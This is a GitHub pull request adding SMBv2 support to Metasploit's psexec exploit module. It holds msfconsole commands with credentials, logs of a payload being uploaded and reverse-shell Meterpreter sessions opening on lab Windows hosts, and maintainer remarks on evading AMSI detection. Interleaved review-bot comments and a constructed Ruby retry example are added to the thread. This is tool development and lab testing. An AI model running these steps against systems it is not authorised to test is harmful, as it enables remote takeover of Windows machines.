psexec smb2 support #10185

Merged
merged 12 commits into rapid7:master from jrobles-r7:rubysmb-psexec on Jun 29, 2018

7 participants
@jrobles-r7
Contributor

jrobles-r7 commented Jun 18, 2018

Description

This PR updates the module exploit/windows/smb/psexec to support SMBv2 connections with RubySMB.
SMB1 tests:

  • Windows 7
  • Windows 10

SMB2 tests:

  • cpe:/o:microsoft:windows_10:::x64
  • cpe:/o:microsoft:windows_8.1::sp1:x64
  • cpe:/o:microsoft:windows_server_2008:r2:sp1:x64
  • cpe:/o:microsoft:windows_7::sp1:x64
  • cpe:/o:microsoft:windows_10:1607::x64
  • cpe:/o:microsoft:windows_8.1:::x64
  • cpe:/o:microsoft:windows_server_2008::r2:x64

Verification

  • Set up a Windows 7 system
  • Edit registry HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters
  • SMB1 REG_DWORD with Data 0
  • SMB2 REG_DWORD with Data 1
  • Restart Windows 7
  • ./msfconsole
  • use exploit/windows/smb/psexec
  • set smbuser <user>
  • set smbpass <pass>
  • set target 1
  • set rhost <rhost>
  • run
  • Get a session
  • set target 2
  • run
  • Get a session
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set target 1 
target => 1
msf5 exploit(windows/smb/psexec) > set smbuser IEUser
smbuser => IEUser
msf5 exploit(windows/smb/psexec) > set smbpass 'Passw0rd!'
smbpass => Passw0rd!
msf5 exploit(windows/smb/psexec) > set rhost 172.22.222.152
rhost => 172.22.222.152
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] 172.22.222.152:445 - Connecting to the server...
[*] 172.22.222.152:445 - Authenticating to 172.22.222.152:445 as user 'IEUser'...
[*] 172.22.222.152:445 - Executing the payload...
[*] Sending stage (179779 bytes) to 172.22.222.152
[*] Meterpreter session 1 opened (172.22.222.177:4444 -> 172.22.222.152:49165) at 2018-06-18 14:07:23 -0500
[-] 172.22.222.152:445 - Exploit failed: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec::Failure
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        :
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.152 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set target 2
target => 2
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] 172.22.222.152:445 - Connecting to the server...
[*] 172.22.222.152:445 - Authenticating to 172.22.222.152:445 as user 'IEUser'...
[*] 172.22.222.152:445 - Uploading payload...
[*] 172.22.222.152:445 - Created \yownzDcO.exe...
[*] Sending stage (179779 bytes) to 172.22.222.152
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.152:49166) at 2018-06-18 14:08:08 -0500
[-] 172.22.222.152:445 - Exploit failed: RubySMB::Error::CommunicationError RubySMB::Error::CommunicationError
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        :
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
@@ -296,6 +296,8 @@ def call(function, data, do_recv = true)

raw_response = ''

sleep 3
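Review bot: the unconditional `sleep 3` inserted after `raw_response = ''` delays every `call` invocation by three seconds, including the ones that would have succeeded immediately, and nothing in the hunk records why the wait is there. Prefer a bounded retry that rescues the specific status the host returns when the request arrives too early and backs off between attempts, and add a comment naming that status so the next reader does not remove the wait as dead code.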

@jrobles-r7

jrobles-r7 Jun 18, 2018

Contributor

This should probably be handled in a better way...
It seems like a wait needs to occur for the DCE-RPC call.
If a request is sent early, the Windows host will respond with an error code that makes it seem like everything is broken.
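The fixed three-second wait discussed in this thread is the simplest way to absorb a request that arrives before the host is ready. The following is an added example, not code from this PR or from RubySMB, showing the bounded-retry-with-backoff shape that avoids paying the full delay on calls that would succeed at once; `TransientRpc::NotReadyError`, `FakePipe` and `rpc_with_retry` are constructed stand-ins, and real code would list the RubySMB error class(es) it wants to tolerate in `retry_on`.

```ruby
# Added example, not code from this PR or RubySMB: bounded retry with backoff
# instead of an unconditional `sleep 3` before a DCE-RPC call. NotReadyError,
# FakePipe and rpc_with_retry are constructed stand-ins for illustration.
module TransientRpc
  # Stand-in for the error a host returns when a request arrives before the
  # named pipe or service is ready (constructed; not a RubySMB class).
  class NotReadyError < StandardError; end
  # Runs the block up to `attempts` times. An exception listed in `retry_on`
  # waits `delay` seconds (doubling, capped at `max_delay`) and retries; any
  # other exception propagates at once. `sleeper` is injectable for tests.
  def self.with_retry(attempts: 5, delay: 0.5, max_delay: 4.0,
                      retry_on: [NotReadyError], sleeper: ->(s) { sleep(s) })
    tries = 0
    begin
      tries += 1
      yield tries
    rescue *retry_on => e
      raise e if tries >= attempts # budget exhausted: surface the last error
      sleeper.call(delay)
      delay = [delay * 2, max_delay].min
      retry
    end
  end
end
# Constructed pipe that rejects the first `ready_after` requests with
# NotReadyError and then answers normally, standing in for the real RPC call.
class FakePipe
  attr_reader :requests
  def initialize(ready_after:)
    @ready_after = ready_after
    @requests = 0
  end
  def call(data)
    @requests += 1
    raise TransientRpc::NotReadyError, "not ready (request #{@requests})" if @requests <= @ready_after
    "response to #{data}"
  end
end

# One call through the retry wrapper against a pipe that becomes ready after
# `ready_after` rejections; waits are recorded, not slept.
# Returns [response, requests_sent, recorded_sleeps].
def rpc_with_retry(ready_after:, attempts: 5)
  pipe = FakePipe.new(ready_after: ready_after)
  sleeps = []
  resp = TransientRpc.with_retry(attempts: attempts, sleeper: ->(s) { sleeps << s }) do
    pipe.call('svcctl request')
  end
  [resp, pipe.requests, sleeps]
end
```

A pipe that is ready immediately costs no wait at all, while a slow one is retried with growing delays until the attempt budget runs out, at which point the last error is raised to the caller.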

@jrobles-r7 jrobles-r7 added the delayed label Jun 18, 2018

@jmartin-r7

Contributor

jmartin-r7 commented Jun 18, 2018

Jenkins test this please.

@jmartin-r7

Contributor

jmartin-r7 commented Jun 18, 2018

The following will get this PR to run your first testing scenario against Windows 10, since I believe the default target selection would work.

git diff
diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..05b070c8f7 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -41,7 +41,8 @@
             "CPE": "cpe:/o:microsoft:windows_7:::x64"
         },
         {
-            "CPE": "cpe:/o:microsoft:windows_10:::x64"
+            "CPE": "cpe:/o:microsoft:windows_10:::x64",
+            "TESTING_SNAPSHOT": "DisableSMBv1"
         }
     ],
     "TARGET_GLOBALS": {
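Review bot: `TESTING_SNAPSHOT` is added only to the Windows 10 entry, so the Windows 7 entry above it still runs with SMBv1 enabled; that gives one target per dialect, which is worth stating in the PR so nobody later "fixes" the asymmetry. The comma moved onto the `"CPE"` line keeps the JSON valid, but the value `DisableSMBv1` is only useful if a snapshot of that name exists on the test image; otherwise the run will fail before the module is exercised.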

Or you could make the change to the windows 7 target above if you want the SMBv2 test performed on that OS.

@jrobles-r7

Contributor

jrobles-r7 commented Jun 19, 2018

For Windows 10 the automatic target selection attempts to use powershell, which wasn't working in my testing. How would I change the json file to select the native upload target (set target 2)? The native upload target should work on both Windows 7 and Windows 10.

@jmartin-r7

Contributor

jmartin-r7 commented Jun 19, 2018

For now SETTINGS == OPTIONS

diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..01eabfdb43 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -12,7 +12,8 @@
             "NAME": "exploit/windows/smb/psexec",
             "SETTINGS": [
                 "SMBUser=vagrant",
-                "SMBPass=vagrant"
+                "SMBPass=vagrant",
+                "TARGET=2"
             ]
         }
     ],
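Review bot: `TARGET=2` in `SETTINGS` applies to every entry in `TARGETS`, so pinning it here forces the native upload target on the Windows 7 run as well and removes automatic target selection (and the PowerShell path) from CI entirely. If that is intended while the PowerShell issue is open, say so in the PR and plan to drop the setting once it is fixed, otherwise the default code path stays untested.
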
@jrobles-r7

Contributor

jrobles-r7 commented Jun 19, 2018

I'll try that now 👍

@jmartin-r7

Contributor

jmartin-r7 commented Jun 21, 2018

Jenkins test this please.

@jmartin-r7

Contributor

jmartin-r7 commented Jun 21, 2018

Looks like the success condition for the test has changed.

diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..9779e13b80 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -34,7 +34,7 @@
     ],
     "STARTING_LISTENER": 30000,
     "SUCCESS_LIST": [
-        "Session 1 created in the background"
+        "Meterpreter session 1 opened"
     ],
     "TARGETS": [
         {
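Review bot: the new success string `Meterpreter session 1 opened` hard-codes the session number, so any scenario in which a session was already opened earlier in the same console run will print a different number (the verification log in the PR description shows `Meterpreter session 2 opened` on the second `run`) and be scored as a failure. Either confirm the harness starts a fresh console per target, or match on a prefix such as `Meterpreter session ` if `SUCCESS_LIST` entries are substring matches.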

jrobles-r7 added some commits Jun 18, 2018

@jrobles-r7 jrobles-r7 force-pushed the jrobles-r7:rubysmb-psexec branch 2 times, most recently from eed928b to 31da00b Jun 25, 2018

busterb and others added some commits Jun 25, 2018

@jrobles-r7 jrobles-r7 force-pushed the jrobles-r7:rubysmb-psexec branch from 8cc3063 to 8e36551 Jun 28, 2018

@busterb

Contributor

busterb commented Jun 28, 2018

Woo, it's green! Removing 'delayed'

@busterb busterb self-assigned this Jun 28, 2018

@busterb busterb added enhancement rubysmb and removed delayed labels Jun 28, 2018

@busterb busterb changed the title psexec smb2 support WIP psexec smb2 support Jun 28, 2018

@GreenEYESSS


GreenEYESSS commented Jun 28, 2018

@busterb

Contributor

busterb commented Jun 28, 2018

@GreenEYESSS those comments are totally unrelated to this PR, and the second module you linked to doesn't actually work either.

@busterb

Contributor

busterb commented Jun 28, 2018

2003/XP systems seem to return this:

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.104:445 - Connecting to the server...
[*] 192.168.56.104:445 - Authenticating to 192.168.56.104:445 as user 'Administrator'...
[-] 192.168.56.104:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode 0x5b0002
[*] Exploit completed, but no session was created.
@GreenEYESSS


GreenEYESSS commented Jun 28, 2018

ok sorry

jrobles-r7 added some commits Jun 28, 2018

@jrobles-r7 jrobles-r7 force-pushed the jrobles-r7:rubysmb-psexec branch from 71a2b0e to 2856c46 Jun 28, 2018

@jrobles-r7

Contributor

jrobles-r7 commented Jun 28, 2018

Jenkins test this please.

@sempervictus

Contributor

sempervictus commented Jun 29, 2018

Powershell target is likely an AMSI catch. They're actually signing for the bloody architecture resolution part of the cmd invocation which we can drop and force the user to set the right arch for now. Evasions like the metasm C stuff cost space in PSH which pushes us to env-stage (something else they can search for).
Thanks for getting this working - smb1 is getting rare.

@jrobles-r7

Contributor

jrobles-r7 commented Jun 29, 2018

The powershell issue with Windows 10 that I was experiencing was resolved in rex-powershell. I will update the description.

@busterb

Contributor

busterb commented Jun 29, 2018

Manual test for Windows 2000:

msf5 exploit(windows/smb/psexec) > set Interrupt: use the 'exit' command to quit
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.102:445 - Connecting to the server...
[*] 192.168.56.102:445 - Authenticating to 192.168.56.102:445 as user 'Administrator'...
[!] 192.168.56.102:445 - No active DB -- Credential data will not be saved!
[*] 192.168.56.102:445 - Uploading payload... qfQlrYxv.exe
[*] 192.168.56.102:445 - Created \qfQlrYxv.exe...
[*] 192.168.56.102:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.102[\svcctl] ...
[*] 192.168.56.102:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.102[\svcctl] ...
[*] 192.168.56.102:445 - Obtaining a service manager handle...
[*] 192.168.56.102:445 - Creating the service...
[+] 192.168.56.102:445 - Successfully created the service
[*] 192.168.56.102:445 - Starting the service...
[+] 192.168.56.102:445 - Service started successfully...
[*] 192.168.56.102:445 - Removing the service...
[+] 192.168.56.102:445 - Successfully removed the service
[*] 192.168.56.102:445 - Closing service handle...
[*] 192.168.56.102:445 - Deleting \qfQlrYxv.exe...
[*] Sending stage (179779 bytes) to 192.168.56.102

meterpreter >

@busterb busterb merged commit 2856c46 into rapid7:master Jun 29, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request Jun 29, 2018

@busterb

Contributor

busterb commented Jun 29, 2018

Release Notes

This adds SMBv1 and SMBv2 support for the exploit/windows/smb/psexec module, enabling compatibility with modern Windows environments (well, until SMB Signing is on by default :).

msjenkins-r7 added a commit that referenced this pull request Jun 29, 2018

@jrobles-r7 jrobles-r7 deleted the jrobles-r7:rubysmb-psexec branch Jun 29, 2018

@11ash


11ash commented Nov 5, 2018

Guys, help. Is this guest machine vulnerable?

[*] Started reverse TCP handler on 192.168.43.119:4444
[*] 192.168.43.50:445 - Connecting to the server...
[*] 192.168.43.50:445 - Authenticating to 192.168.43.50:445 as user 'pass'...
[-] 192.168.43.50:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_USER_SESSION_DELETED
[*] Exploit completed, but no session was created.
